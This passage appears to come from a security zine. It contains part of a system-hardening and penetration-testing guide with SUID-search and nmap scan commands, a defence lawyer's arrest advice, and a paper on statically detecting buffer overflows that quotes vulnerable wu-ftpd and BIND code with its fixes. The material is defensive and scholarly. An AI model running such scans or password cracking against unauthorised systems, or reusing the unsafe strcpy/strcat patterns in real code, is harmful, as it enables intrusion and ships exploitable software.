Solaris, or Linux if you have sufficient knowledge of securing it. The most problematic thing is, that it has become very easy to install even a complex UNIX system, and that many people only do enough to get it up and running. You should get a system that is at least one year old, or older, to make sure that most of the vulnerabilities present in the system have already been spotted - this is important, the people who always install the newest version of their systems, one day after they come out, put their security at risk worse than people who run outdated, but well-patched systems. Secondly, go to your vendors web site and inform yourself about which software packages you should update. Regarding security purposes, it is only important to update packages that are suid root, always run as root, and servers that you generally need and run. Next, disable any servers that run by default and that you won't explicitly require on your network! Browse through your files, looking for suid binaries: find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec ls -ldb {} \; Remove the suid flag (chmod 755 each binary) on any of the programs that don't need to be run by non-root users / scripts with root privileges. Now you need to examine your system and server configuration, most of it is in the /etc directory. Get to know your operating systems security mechanisms, and also recompile your kernel. You should have basic knowledge of every server / daemon process that you run on your machines, and check the configuration for it. Once you have done all this, you can consider to have a system with basic stability and security present. Also consider doing this on one system and copying your partitions to other systems to save yourself some work. One more recommended thing is to block ICMP at your border router(s), to be safe from ICMP 'firewalking' and generic denial of service. To prevent 'smurf' and other flood attacks, specifically make sure your broadcast addresses do not reply to ICMP (IPs ending in .0 and .255), and (if you use IOS or something similar), make your routers detect 'flood' attacks and go into high-bandwidth or alternative-route modes if they detect a certain amount of packets in a specified amount of time. Connection-oriented routing can also be very useful. Finally, deny all other known and unknown IP protocols besides TCP, UDP and ICMP, in case you don't need them. Creating reliable audit trails One simple precaution that everyone should take is to make sure that audit trails (in other words: logs) are present, and one instance of them cannot be altered. Compile a list of servers that you don't (!) and never will run on any of the machines on your network, and instruct your border routers that connect you with the rest of the world, to deny and log all incoming requests to those ports. Don't block port 20 unless you want to break active ftp transfers, and don't block ports above 1024 (non-privileged). You should have some instance of remote logging available, that each of your hosts uses. The easiest way is to configure syslog (see syslog.conf manpage) to log all messages to a remote loghost. A loghost is a dedicated, secured machine that runs only syslog and sshd (or not even sshd, so it is accessible only physically via console) and has enough disk space for all the logs. A good idea would also be a solution with digitally signed and/or encrypted logs to prevent manipulation and to ensure authenticity. Once you have done this, you can implement extra Intrusion Detection and firewalling services. This is recommended as extra security mechanism, but not required, if you have really secured your machines well, and a bit too much to cover it all in one article. Only this much: If you implement a firewall/IDS, then first perform step 3, install the firewall with a good rule set and perform step 3 again to audit your firewall rules and your IDS stability and logging capabilities. Penetration testing I: gathering information Now, let us find every available service. If this step is performed before implementing a firewall, it should be performed from within the local network, to be as reliable as possible, else from behind the network border. You should use nmap [4] for port scanning, which is currently the most reliable and comprehensible way of port scanning available. Scan tcp port range 1 to 65535 and udp port range 1 to 65535 on every host, and save the results (open ports). This would look like, for example: nmap -sT -P0 -p1-65535 -I -n 10.0.0.0/24 >> results.txt nmap -sU -P0 -p1-65535 -I -n 10.0.0.0/24 >> results.txt (This would scan hosts 10.0.0.0 to 10.0.0.255.) Note: to audit firewall rules or IDS logging capabilities, re-run this scan with values like: -f, -sS / -sF / -sN and -g 20 / 53 / 80 The results should NOT show more than normal scans, and an eventually installed IDS should detect and log the stealth scanning tricks. Penetration testing II: evaluating information Generally, the causes of remote network security problems can be classified into five groups: I. Problems due to buffer overflows (ex.: exploitable imap server) II. Problems due to generally insecure programs (ex.: insecure CGI scripts) III. Problems due to insecure configuration (ex.: default samba shares) IV. Problems due to lack of or insecure passwords (ex.: SNMP daemon) V. Backdoors and trojan horses (not applicable if you went through step 1.) Many people see a penetration check as an attempt to exploit any of these problems, if present, to gain access (hack) into a host and therefore prove that it is insecure. This is not sufficient to ensure the security in a systematical way, however, because one would omit the potential holes. One way to start off, is using a well-designed and reliable security scanner, like NSAT [5]. I don't only recommend it because of self-promotion ;), but because it scans for a lot of vulnerabilities and does not only report them, but rather a lot of information, versions, auditing results etc. out of which one can draw its own conclusions. In contrary to many other scanners, this enables NSAT to audit services at all times with maximum efficiency, while it doesn't need to maintain a very recent vulnerabilities database. Give NSAT a try and audit the services it scans for with it. However, if you run other uncommon services, that NSAT does not scan for, or you want to be 100% safe you should afterwards scan and examine them manually as well, using telnet, netcat, browser, etc. sessions. To actually identify all vulnerabilities, (you may have guessed it, this is the hardest part :)!), search archives of security mailing lists [8], security sites [9], and vendor sites for known security issues regarding the server, and also don't be afraid to write the author to ask if your version is vulnerable. If you find no exploits or advisories regarding your program at all, you can consider it to be secure. The better way is of course, to search updates for every server you run and install the latest versions. Retain from running anything if you don't fully understand how to configure and maintain it. In most cases, understanding a program up to the point where you know how to properly secure it, doesn't take too much work, as most GNU programs are generally well-documented and user friendly once you get to know them. There are a few examples, where you can not audit services satisfyingly by looking at the version or performing sample sessions, namely httpd, where you have to locally examine the CGI scripts. You can use very sophisticated and flexible CGI scanners to locate vulnerable CGI's, but you can never be sure to find all by doing a remote scan. You need to locally scan your cgi-bin/ directory and scripts that may reside somewhere else in your document root. A big security risk are self-written or uncommon CGI scripts, an intruder WILL scan and find those, if he tries hard enough. Always consider every executable script on your HTTP server as relevant to security as a separate server running with the privileges of your httpd. Another important subjects are services with password authentication. If possible, disable non-encrypted services and use kerberos-enabled mail servers, and ssh / sftp instead. It is crucial to your security to have all authentication mechanisms use strong, non-standard passwords that cannot be easily brute forced. Configuring your standard authentication not to take weak passwords at all is a good idea. If you are securing multi- user systems, you should always make secure passwords a central point in your security policy. (But designing an adequate security policy is another big, important topic besides network security.) BSD style MD5 and all DES passwords can and should be tested with John [6]; other issues with passwords exist in snmp, http auth, linuxconf, r-services, SQL and various other services. A small collection of related articles and programs [1] Q - stealth encryted remote shell and redirection server http://members.tripod.com/mixtersecurity/Q-0.9.tgz [2] Brian Martin: Why your network is still vulnerable http://www.hackernews.com/orig/whyvuln.html [3] David Curry: Improving your network by breaking into it http://www.rootshell.com/beta/docs/improving_security_sri.ps.gz [4] Nmap by fyodor http://www.insecure.org/nmap [5] Network security analysis tool http://members.tripod.com/mixtersecurity/nsat-1.09.tgz [6] John the ripper by Solar Designer http://www.false.com/security [7] Daniel V. Klein: Foiling the Cracker http://www.rootshell.com/beta/docs/passwords_klein.ps.gz [8] Security Focus / Bugtraq Mailing List archives http://www.securityfocus.com [9] Packet Storm Security http://packetstorm.securify.com Mixter mixter@newyorkoffice.com http://members.tripod.com/mixtersecurity ==================[ Ten Things NOT to do if Arrested ]================== --- by Brian Dinday --- I have been practicing criminal law for 24 years and have seen a wide variety of reactions by people who are being arrested. Some of these reactions are unwise but understandable. Others are self defeating to the point of being bizarre. No one plans to be arrested, but it might help to think just once about what you will do and not do if you ever hear the phrase "Put your hands behind you." The simplest "to do" rule is to do what you are told. Simple, but somehow it often escapes someone who is either scared or intoxicated. More important to guarding your rights and interests are ten things you SHOULD NOT do: 1. Don’t try to convince the officer of your innocence. It’s useless. He or she only needs "probable cause" to believe you have committed a crime in order to arrest you. He does not decide your guilt and he actually doesn’t care if you are innocent or not. It is the job of the judge or jury to free you if he is wrong. If you feel that urge to convince him he’s made a mistake, remember the overwhelming probability that instead you will say at least one thing that will hurt your case, perhaps even fatally. It is smarter to save your defense for your lawyer. 2. Don’t run. It’s highly unlikely a suspect could outrun ten radio cars converging on a block in mere seconds. I saw a case where a passenger being driven home by a drunk friend bolted and ran. Why? It was the driver they wanted, and she needlessly risked injury in a forceful arrest. Even worse, the police might have suspected she ran because she had a gun, perhaps making them too quick to draw their own firearms. Most police will just arrest a runner, but there are some who will be mad they had to work so hard and injure the suspect unnecessarily. 3. Keep quiet. My hardest cases to defend are those where the suspect got very talkative. Incredibly, many will start babbling without the police having asked a single question. My most vivid memory of this problem was the armed robbery suspect who blurted to police: "How could the guy identify me? The robbers was wearing masks." To which the police smiled and responded, "Oh? Were they?" Judges and juries will discount or ignore what a suspect says that helps him, but give great weight to anything that seems to hurt him. In 24 years of criminal practice, I could count on one hand the number of times a suspect was released because of what he told the police after they arrested him. 4. Don’t give permission to search anywhere. If they ask, it probably means they don’t believe they have the right to search and need your consent. If you are ordered to hand over your keys, state loudly "You do NOT have my permission to search." If bystanders hear you, whatever they find may be excluded from evidence later. This is also a good reason not to talk, even if it seems all is lost when they find something incriminating. 5. If the police are searching your car or home, don’t look at the places you wish they wouldn’t search. Don’t react to the search at all, and especially not to questions like "Who does this belong to?" 6. Don’t resist arrest. Above all, do not push the police or try to swat their hands away. That would be assaulting an officer and any slight injury to them will turn your minor misdemeanor arrest into a felony. A petty shoplifter can wind up going to state prison that way. Resisting arrest (such as pulling away) is merely a misdemeanor and often the police do not even charge that offense. Obviously, striking an officer can result in serious injury to you as well. 7. Try to resist the temptation to mouth off at the police, even if you have been wrongly arrested. Police have a lot of discretion in what charges are brought. They can change a misdemeanor to a felony, add charges, or even take the trouble to talk directly to the prosecutor and urge him to go hard on you. On the other hand, I have seen a client who was friendly to the police and talked sports and such on the way to the station. They gave him a break. Notice he did not talk about his case, however. 8. Do not believe what the police tell you in order to get you to talk. The law permits them to lie to a suspect in order to get him to make admissions. For example, they will separate two friends who have been arrested and tell the first one that the second one squealed on him. The first one then squeals on the second, though in truth the second one never said anything. An even more common example is telling a suspect that if he talks to the police, "it will go easier". Well, that’s sort of true. It will be much easier for the police to prove their case. I can’t remember too many cases where the prosecutor gave the defendant an easier deal because he waived his right to silence and confessed. 9. If at home, do not invite the police inside, nor should you "step outside". If the police believe you have committed a felony, they usually need an arrest warrant to go into your home to arrest you. If they ask you to "step outside", you will have solved that problem for them. The correct responses are: "I am comfortable talking right here.", "No, you may not come in.", or "Do you have a warrant to enter or to arrest me in my home?" I am not suggesting that you run. In fact, that is the best way to ensure the harshest punishment later on. But you may not find it so convenient to be arrested Friday night when all the courts and law offices are closed. With an attorney, you can perhaps surrender after bail arrangements are made and spend NO time in custody while your case is pending. 10. If you are arrested outside your home, do not accept any offers to let you go inside to get dressed, change, get a jacket, call your wife, or any other reason. The police will of course escort you inside and then search everywhere they please, again without a warrant. Likewise decline offers to secure your car safely. That’s it: Ten simple rules that will leave as many of your rights intact as possible if you are arrested. How about a short test? You have a fight with your live-in girlfriend and the police come and find you on the sidewalk two houses down from the apartment. The girlfriend points you out and the police arrest you for assault. They tell you they don’t intend to question you. They just want your name and address. Do you answer? Well, you shouldn’t. Your address is the single most damaging admission you could make. If you admit living with her, you have just converted a misdemeanor assault into a felony punishable by state prison. When you are arrested it is their game, and you don’t know the rules. It is best to be silent and let the attorney handle it later. The bottom line is that if the police have enough evidence to arrest, they will. If they don’t have that evidence, you could easily provide it by talking. =====[ Statically Detecting Likely Buffer Overflow Vulnerabilities ]===== --- by David Larochelle and David Evans --- Abstract Buffer overflow attacks may be today’s single most important security threat. This paper presents a new approach to mitigating buffer overflow vulnerabilities by detecting likely vulnerabilities through an analysis of the program source code. Our approach exploits information provided in semantic comments and uses lightweight and efficient static analyses. This paper describes an implementation of our approach that extends the LCLint annotation-assisted static checking tool. Our tool is as fast as a compiler and nearly as easy to use. We present experience using our approach to detect buffer overflow vulnerabilities in two security-sensitive programs. Introduction Buffer overflow attacks are an important and persistent security problem. Buffer overflows account for approximately half of all security vulnerabilities [CWPBW00, WFBA00]. Richard Pethia of CERT identified buffer overflow attacks as the single most im­por­tant security problem at a recent software engineering conference [Pethia00]; Brian Snow of the NSA predicted that buffer overflow attacks would still be a problem in twenty years [Snow99]. Programs written in C are particularly susceptible to buffer overflow attacks. Space and performance were more important design considerations for C than safety. Hence, C allows direct pointer manipulations without any bounds checking. The standard C library includes many functions that are unsafe if they are not used carefully. Nevertheless, many security-critical pro­grams are written in C. Several run-time approaches to mitigating the risks associated with buffer overflows have been proposed. Despite their availability, these techniques are not used widely enough to substantially mitigate the effectiveness of buffer overflow attacks. The next section describes representative run-time approaches and speculates on why they are not more widely used. We propose, instead, to tackle the problem by detecting likely buffer overflow vulnerabilities through a static analysis of program source code. We have im­ple­ment­ed a prototype tool that does this by extending LCLint [Evans96]. Our work differs from other work on static detection of buffer overflows in three key ways: (1) we exploit semantic comments added to source code to enable local checking of interprocedural properties; (2) we focus on lightweight static checking techniques that have good performance and scalability characteristics, but sacrifice soundness and completeness; and (3) we introduce loop heuristics, a simple approach for efficiently analyzing many loops found in typical programs. The next section of this paper provides some background on buffer overflow attacks and previous attempts to mitigate the problem. Section 3 gives an overview of our approach. In Section 4, we report on our experience using our tool on wu-ftpd and BIND, two security-sensitive programs. The following two sec­tions provide some details on how our analysis is done. Section 7 compares our work to related work on buffer overflow detection and static analysis. Buffer Overflow Attacks and Defenses The simplest buffer overflow attack, stack smashing [AlephOne96], overwrites a buffer on the stack to replace the return address. When the function returns, instead of jumping to the return address, control will jump to the address that was placed on the stack by the attacker. This gives the attacker the ability to execute arbitrary code. Programs written in C are particularly susceptible to this type of attack. C provides direct low-level memory access and pointer arithmetic without bounds checking. Worse, the standard C library provides unsafe functions (such as gets) that write an unbounded amount of user input into a fixed size buffer without any bounds checking [ISO99]. Buffers stored on the stack are often passed to these functions. To exploit such vulnerabilities, an attacker merely has to enter an input larger than the size of the buffer and encode an attack program binary in that input. The Internet Worm of 1988 [Spafford88, RE89] exploited this type of buffer overflow vulnerability in fingerd. More so­phis­ti­ca­ted buffer overflow attacks may exploit unsafe buffer usage on the heap. This is harder, since most programs do not jump to addresses loaded from the heap or to code that is stored in the heap. Several run-time solutions to buffer overflow attacks have been proposed. StackGuard [CPMH+98] is a com­pi­ler that generates binaries that incorporate code designed to prevent stack smashing attacks. It places a special value on the stack next to the return address, and checks that it has not been tampered with before jumping. Baratloo, Singh and Tsai describe two run-time approaches: one replaces unsafe library func­tions with safe implementations; the other modifies executables to perform sanity checking of return ad­dress­es on the stack before they are used [BST00]. Software fault isolation (SFI) is a technique that inserts bit mask instructions before memory operations to prevent access of out-of-range memory [WLAG93]. This alone does not offer much protection against typical buffer overflow attacks since it would not prevent a program from writing to the stack address where the return value is stored. Generalizations of SFI can insert more expressive checking around potentially dangerous operations to restrict the behavior of programs more generally. Examples include Janus, which observes and mediates behavior by monitoring system calls [GWTB96]; Naccio [ET99, Evans00a] and PSLang/PoET [ES99­, ES00] which transform object programs accord­ing to a safety policy; and Generic Software Wrappers [FBF99] which wraps system calls with security checking code. Buffer overflow attacks can be made more difficult by modifications to the operating system that put code and data in separate memory segments, where the code segment is read-only and instructions cannot be executed from the data segment. This does not eliminate the buffer overflow problem, however, since an attacker can still overwrite an address stored on the stack to make the program jump to any point in the code segment. For programs that use shared libraries, it is often possible for an attacker to jump to an address in the code segment that can be used maliciously (e.g., a call to system). Developers decided against using this approach in the Linux kernel since it did not solve the real problem and it would prevent legitimate uses of self-modifying code [Torvalds98, Coolbaugh99]. Despite the availability of these and other run-time approaches, buffer overflow attacks remain a persistent problem. Much of this may be due to lack of awareness of the severity of the problem and the availability of practical solutions. Nevertheless, there are legitimate reasons why the run-time solutions are unacceptable in some environments. Run-time solutions always incur some performance penalty (StackGuard reports performance overhead of up to 40% [CBDP+99]). The other problem with run-time solutions is that while they may be able to detect or prevent a buffer overflow attack, they effectively turn it into a denial-of-service attack. Upon detecting a buffer overflow, there is often no way to recover other than terminating execution. Static checking overcomes these problems by detecting likely vulnerabilities before deployment. Detecting buffer overflow vulnerabilities by analyzing code in general is an undecidable problem.[1] Nevertheless, it is possible to produce useful results using static analysis. Rather than attempting to verify that a program has no buffer overflow vulnerabilities, we wish to have reasonable confidence of detecting a high fraction of likely buffer overflow vulnerabilities. We are willing to accept a solution that is both unsound and incomplete. This means that our checker will sometimes generate false warnings and sometimes miss real problems. Our goal is to produce a tool that produces useful results for real programs with a reasonable effort. The next section describes our approach. We compare our work with other static approaches to detecting buffer overflow vulnerabilities in Section 7. Approach Our static analysis tool is built upon LCLint [EGHT94, Evans96, Evans00b], an annotation-assisted lightweight static checking tool. Examples of problems detected by LCLint include violations of information hiding, inconsistent modifications of caller-visible state or uses of global variables, misuses of possibly NULL references, uses of dead storage, memory leaks and problems with parameters aliasing. LCLint is actually used by working programmers, especially in the open source development community [Orcero00, PG00]. Our approach is to exploit semantic comments (henceforth called annotations) that are added to source code and standard libraries. Annotations describe programmer assumptions and intents. They are treated as regular C comments by the compiler, but recognized as syntactic entities by LCLint using the @ following the /* to identify a semantic comment. For example, the annotation /*@notnull@*/ can be used syntactically like a type qualifier. In a parameter declaration, it indicates that the value passed for this parameter may not be NULL. Although annotations can be used on any declaration, for this discussion we will focus exclusively on function and parameter declarations. We can also use annotations similarly in declarations of global and local variables, types and type fields. Annotations constrain the possible values a reference can contain either before or after a function call. For example, the /*@notnull@*/ annotation places a constraint on the parameter value before the function body is entered. When LCLint checks the function body, it assumes the initial value of the parameter is not NULL. When LCLint checks a call site, it reports a warning unless it can determine that the value passed as the corresponding parameter is never NULL. Prior to this work, all annotations supported by LCLint classified references as being in one of a small number of possible states. For example, the annotation /*@null@*/ indicated that a reference may be NULL, and the annotation /*@notnull@*/ indicated that a reference is not NULL. In order to do useful checking of buffer overflow vulnerabilities, we need annotations that are more expressive. We are concerned with how much memory has been allocated for a buffer, something that cannot be adequately modeled using a finite number of states. Hence, we need to extend LCLint to support a more general annotation language. The annotations are more expressive, but still within the spirit of simple semantic comments added to programs. The new annotations allow programmers to explicitly state function preconditions and postconditions using requires and ensures clauses.[2] We can use these clauses to describe assumptions about buffers that are passed to functions and constrain the state of buffers when functions return. For the analyses described in this paper, four kinds of assumptions and constraints are used: minSet, maxSet, minRead and maxRead.[3] When used in a requires clause, the minSet and maxSet annotations describe assumptions about the lowest and highest indices of a buffer that may be safely used as an lvalue (e.g., on the left-hand side of an assignment). For example, consider a function with an array parameter a and an integer parameter i that has a pre­condition requires maxSet(a) >= i. The analysis assumes that at the beginning of the function body, a[i] may be used as an lvalue. If a[i+1] were used before any modifications to the value of a or i, LCLint would generate a warning since the function preconditions are not sufficient to guarantee that a[i+1] can be used safely as an lvalue. Arrays in C start with index 0, so the declaration char buf[MAXSIZE] generates the constraints maxSet(buf) = MAXSIZE - 1 and minSet(buf) = 0. Similarly, the minRead and maxRead constraints indicate the minimum and maximum indices of a buffer that may be read safely. The value of maxRead for a given buffer is always less than or equal to the value of maxSet. In cases where there are elements of the buffer have not yet been initialized, the value of maxRead may be lower than the value of maxSet. At a call site, LCLint checks that the preconditions implied by the requires clause of the called function are satisfied before the call. Hence, for the requires maxSet(a) >= i example, it would issue a warning if it cannot determine that the array passed as a is allocated to hold at least as many elements as the value passed as i. If minSet or maxSet is used in an ensures clause, it indicates the state of a buffer after the function returns. Checking at the call site proceeds by assuming the postconditions are true after the call returns. For checking, we use an annotated version of the standard library headers. For example, the function strcpy is annotated as[4]: char *strcpy (char *s1, const char *s2) /*@requires maxSet(s1) >= maxRead(s2)@*/ /*@ensures maxRead(s1) == maxRead(s2) /\ result == s1@*/; The requires clause specifies the precondition that the buffer s1 is allocated to hold at least as many char­acters as are readable in the buffer s2 (that is, the number of characters up to and including its null terminator). The postcondition reflects the behavior of strcpy – it copies the string pointed to by s2 into the buffer s1, and returns that buffer. In ensures clauses, we use the result keyword to denote the value returned by the function. Many buffer overflows result from using library functions such as strcpy in unsafe ways. By annotating the standard library, many buffer overflow vulnerabilities can be detected even before adding any annotations to the target program. Selected annotated standard library functions are shown in Appendix A. Experience In order to test our approach, we used our tool on wu-ftpd, a popular open source ftp server, and BIND (Berkeley Internet Name Domain), a set of domain name tools and libraries that is considered the reference implementation of DNS. This section describes the process of running LCLint on these applications, and illustrates how our checking detected both known and unknown buffer overflow vulnerabilities in each appli­cation. 4.1 wu-ftpd We analyzed wu-ftp-2.5.0[5], a version with known se­cur­ity vulnerabilities. Running LCLint is similar to running a compiler. It is typically run from the command line by listing the source code files to check, along with flags that set checking parameters and control which classes of warnings are reported. It takes just over a minute for LCLint to analyze all 17 000 lines of wu-ftpd. Running LCLint on the entire unmodified source code for wu-ftpd without adding any annotations resulted in 243 warnings related to buffer overflow checking. Consider a representative message[6]: ftpd.c:1112:2: Possible out-of-bounds store. Unable to resolve constraint: maxRead ((entry->arg[0] @ ftpd.c:1112:23)) <= (1023) needed to satisfy precondition: requires maxSet ((ls_short @ ftpd.c:1112:14)) >= maxRead ((entry->arg[0] @ ftpd.c:1112:23)) derived from strcpy precondition: requires maxSet () >= maxRead () Relevant code fragments are shown below with line 1112 in bold: char ls_short[1024]; ... extern struct aclmember * getaclentry(char *keyword, struct aclmember **next); ... int main(int argc, char **argv, char **envp) { ... entry = (struct aclmember *) NULL; if (getaclentry("ls_short", &entry) && entry->arg[0] && (int)strlen(entry->arg[0]) > 0) { strcpy(ls_short,entry->arg[0]); ... This code is part of the initialization code that reads configuration files. Several buffer overflow vul­ner­a­bil­i­­ties were found in the wu-ftpd initialization code. Although this vulnerability is not likely to be exploited, it can cause security holes if an untrustworthy user is able to alter configuration files. The warning message indicates that a possible out-of-bounds store was detected on line 1112 and contains information about the constraint LCLint was unable to resolve. The warning results from the function call to strcpy. LCLint generates a pre­con­dit­ion constraint corresponding to the strcpy requires clause maxSet(s1) >= maxRead(s2) by substituting the actual parameters: maxSet (ls_short @ ftpd.c:1112:14) >= maxRead (entry->arg[0] @ ftpd.c:1112:23). Note that the locations of the expressions passed as actual parameters are recorded in the constraint. Since values of expressions may change through the code, it is important that constraints identify values at particular program points. The global variable ls_short was declared as an array of 1024 characters. Hence, LCLint determines maxSet (ls_short) is 1023. After the call to getaclentry, the local entry->arg[0] points to a string of arbitrary length read from the configuration file. Because there are no annotations on the getaclentry function, LCLint does not assume anything about its behavior. In particular, the value of maxRead (entry->arg[0]) is unknown. LCLint reports a possible buffer misuse, since the constraint derived from the strcpy requires clause may not be satisfied if the value of maxRead (entry->arg[0]) is greater than 1023. To fix this problem, we modified the code to handle these values safely by using strncpy. Since ls_short is a fixed size buffer, a simple change to use strncpy and store a null character at the end of the buffer is sufficient to ensure that the code is safe.[7] In other cases, eliminating a vulnerability involved both changing the code and adding annotations. For example, LCLint generated a warning for a call to strcpy in the function acl_getlimit: int acl_getlimit(char *class, char *msgpathbuf) { int limit; struct aclmember *entry = NULL; if (msgpathbuf) *msgpathbuf = '\0'; while (getaclentry("limit", &entry)) { ... if (!strcasecmp(class, entry->arg[0])) { ... if (entry->arg[3] && msgpathbuf != NULL) strcpy(msgpathbuf, entry->arg[3]); ... If the size of msgputhbuf is less than the length of the string in entry->arg[3], there is a buffer overflow. To fix this we replaced the strcpy call with a safe call to strncpy: strncpy(msgpathbuf, entry->arg[3], 199); msgpathbuf[199] = '\0'; and added a requires clause to the function declaration: /*@requires maxSet(msgpathbuf) >= 199@*/ The requires clause documents an assumption (that may be incorrect) about the size of the buffer passed to acl_getlimit. Because of the constraints denoted by the requires clauses, LCLint does not report a warning for the call to strncpy. When call sites are checked, LCLint produces a warn­ing if it is unable to determine that this requires clause is satisfied. Originally, we had modified the function acl_getlimit by adding the precondition maxSet (msgpathbuf) >= 1023. After adding this precondition, LCLint produced a warning for a call site that passed a 200-byte buffer to acl_getlimit. Hence, we re­placed the requires clause with the stronger constraint and used 199 as the parameter to strncpy. This vulnerability was still present in the current ver­sion of wu-ftpd. We contacted the wu-ftpd developers who acknowledged the bug but did not consider it security critical since the string in question is read from a local file not user input [Luckin01, Lundberg01]. In addition to the previously unreported buffer overflows in the initialization code, LCLint detected a known buffer overflow in wu-ftpd. The buffer overflow occurs in the function do_elem shown below, which passes a global buffer and its parameters to the library function strcat. The function mapping_chdir calls do_elem with a value entered by the remote user as its parameter. Because wu-ftpd fails to perform sufficient bounds checking, a remote user is able to exploit this vulnerability to overflow the buffer by carefully creating a series of directories and executing the cd command.[8] char mapped_path [200]; ... void do_elem(char *dir) { ... if (!(mapped_path[0] == '/' && mapped_path[1] == '\0')) strcat (mapped_path, "/"); strcat (mapped_path, dir); } LCLint generates warnings for the unsafe calls to strcat. This was fixed in latter versions of wu-ftpd by calling strncat instead of strcat. Because of the limitations of static checking, LCLint some­­times generates spurious error messages. If the user believes the code is correct, annotations can be added to precisely suppress spurious messages. Often the code was too complex for LCLint to analyze correctly. For example, LCLint reports a spurious warning for this code fragment since it cannot determine that ((1.0*j*rand()) / (RAND_MAX + 1.0)) always produces a value between 1 and j: i = passive_port_max - passive_port_min + 1; port_array = calloc (i, sizeof (int)); for (i = 3; ... && (i > 0); i--) { for (j = passive_port_max - passive_port_min + 1; ... && (j > 0); j--) { k = (int) ((1.0 * j * rand()) / (RAND_MAX + 1.0)); pasv_port_array [j-1] = port_array [k]; Determining that the port_array[k] reference is safe would require far deeper analysis and more precise specifications than is feasible within a lightweight static checking tool. Detecting buffer overflows with LCLint is an iterative process. Many of the constraints we found involved functions that are potentially unsafe. We added function preconditions to satisfy these constraints where possible. In certain cases, the code was too convoluted for LCLint to determine that our preconditions satisfied the constraints. After convincing ourselves the code was correct, we added annotations to suppress the spurious warnings. Before any annotations were added, running LCLint on wu-ftpd re­sulted in 243 warn­ings each corresponding to an unresolved constraint. We added 22 annotations to the source code through an iterative process similar to the examples described above. Nearly all of the annotations were used to indicate preconditions constraining the value of maxSet for function parameters. After adding these annotations and modifying the code, running LCLint produced 143 warnings. Of these, 88 reported unresolved constraints involving maxSet. While we believe the remaining warnings did not indicate bugs in wu-ftpd, LCLint’s analyses were not sufficiently powerful to determine the code was safe. Although this is a higher number of spurious warnings than we would like, most of the spurious warnings can be quickly understood and suppressed by the user. The source code contains 225 calls to the potentially buffer overflowing functions strcat, strcpy, strncat, strncpy, fgets and gets. Only 18 of the unresolved warnings resulted from calls to these functions. Hence, LCLint is able to determine that 92% of these calls are safe automatically. The other warnings all dealt with classes of problems that could not be detected through simple lexical techniques. 4.2 BIND BIND is a key component of the Internet infrastructure. Recently, the Wall Street Journal iden­ti­fied buffer overflow vulnerabilities in BIND as a critical threat to the Internet [WSJ01]. We focus on named, the DNS sever portion of BIND, in this case study. We analyzed BIND version 8.2.2p7[9], a version with known bugs. BIND is larger and more complex than wu-ftpd. The name server portion of BIND, named, contains approximately 47 000 lines of C including shared li­bra­ries. LCLint took less than three and a half minutes to check all of the named code. We limited our analysis to a subset of named because of the time required for human analysis. We focused on three files: ns_req.c and two library files that contain functions which are called extensively by ns_req.c: ns_name.c and ns_sign.c. These files contain slightly more than 3 000 lines of code. BIND makes extensive use of functions in its internal library rather than C library functions. In order to accurately analyze individual files, we needed to annotate the library header files. The most accurate way to annotate the library would be to iteratively run LCLint on the library and add annotations. However, the library was extremely large and contains deeply nested call chains. To avoid the human analysis this would require, we added annotations to some of the library functions without annotating all the dependent functions. In many cases, we were able to guess preconditions by using comments or the names of function parameters. For example, several functions took a pointer parameter (p) and another parameter encoding it size (psize), from which we inferred a precondition MaxSet(p) >= (psize – 1). After annotating selected BIND library functions, we were able to check the chosen files without needing to fully annotate all of BIND. LCLint produces warnings for a series of unguarded buffer writes in the function req_query. The code in question is called in response to a specific type of query which requests information concerning the domain name server version. BIND appends a response to the buffer containing the query that includes a global string read from a configuration file. If the default configuration is used, the code is safe because this function is only called with buffers that are large enough to store the response. However, the restrictions on the safe use of this function are not obvious and could easily be overlooked by someone modifying the code. Additionally, it is possible that an administrator could reconfigure BIND to use a value for the server version string large enough to make the code unsafe. The BIND developers agreed that a bounds check should be inserted to eliminate this risk [Andrews01]. BIND uses extensive run time bounds checking. This type of defensive programming is important for writing secure programs, but does not guarantee that a program is secure. LCLint detected a known buffer overflow in a function that used run time checking but specified buffer sizes incorrectly.[10] The function ns_req examines a DNS query and gen­er­ates a response. As part of its message processing, it looks for a signature and signs its response with the function ns_sign. LCLint reported that it was unable to satisfy a precondition for ns_sign that requires the size of the message buffer be accurately described by a size parameter. This precondition was added when we initially annotated the shared library. A careful hand analysis of this function reveals that to due to careless modification of variables denoting buffer length, it is possible for the buffer length to be specified incorrectly if the message contains a signature but a valid key is not found. This buffer overflow vulnerability was introduced when a digital signature feature was added to BIND (ironically to increase security). Static analysis tools can be used to quickly alert programmers to assumptions that are broken by incremental code changes. Based on our case studies, we believe that LCLint is a useful tool for improving the security of programs. It does not detect all possible buffer overflow vulnerabilities, and it can generate spurious warnings. In practice, however, it provides programmers concerned about security vulnerabilities with useful assistance, even for large, complex programs. In addition to aiding in the detection of exploitable buffer overflows, the process of adding annotations to code encourages a disciplined style of programming and produces programs that include reliable and precise documentation. Implementation Our analysis is implemented by combining traditional compiler data flow analyses with constraint generation and resolution. Programs are analyzed at the function level; all interprocedural analyses are done using the information contained in annotations. We support four types of constraints corresponding to the annotations introduced in Section 2: maxSet, minSet, maxRead, and minRead. Constraints can also contain constants and variables and allow the arithmetic operations: + and -. Terms in constraints can refer to any C expression, although our analysis will not be able to evaluate some C expressions statically. The full constraint grammar is: constraint Þ (requires | ensures) constraintExpression relOp constraintExpression relationalOp Þ == | > | >= | < | <= constraintExpression Þ constraintExpression binaryOp constraintExpresion | unaryOp ( constraintExpression ) | term binaryOp Þ + | - unaryOp Þ maxSet | maxRead | minSet | minRead term Þ variable | C expression | literal | result Source-code annotations allow arbitrary constraints (as defined by our constraint grammar) to be specified as the preconditions and postconditions of functions. Constraints can be conjoined (using /\), but there is no support for disjunction. All variables used in constraints have an associated location. Since the value stored by a variable may change in the function body, it is important that the constraint resolver can distinguish the value at different points in the program execution. Constraints are generated at the expression level and stored in the corresponding node in the parse tree. Constraint resolution is integrated with the checking by resolving constraints at the statement level as checking traverses up the parse tree. Although this limits the power of our analysis, it ensures that it will be fast and simple. The remainder of this section describes briefly how constraints are represented, generated and resolved. Constraints are generated for C statements by traversing the parse tree and generating constraints for each subexpression. We determine constraints for a statement by conjoining the constraints of its subexpressions. This assumes subexpressions cannot change state that is used by other subexpressions of the same expression. The semantics of C make this a valid assumption for nearly all expressions – it is undefined behavior in C for two subexpressions not separated by a sequence point to read and write the same data. Since LCLint detects and warns about this type of undefined behavior, it is reasonable for the buffer overflow checking to rely on this assumption. A few C expressions do have intermediate sequence points (such as the comma operator which specifies that the left operand is always evaluated first) and cannot be analyzed correctly by our simplified assumptions. In practice, this has not been a serious limitation 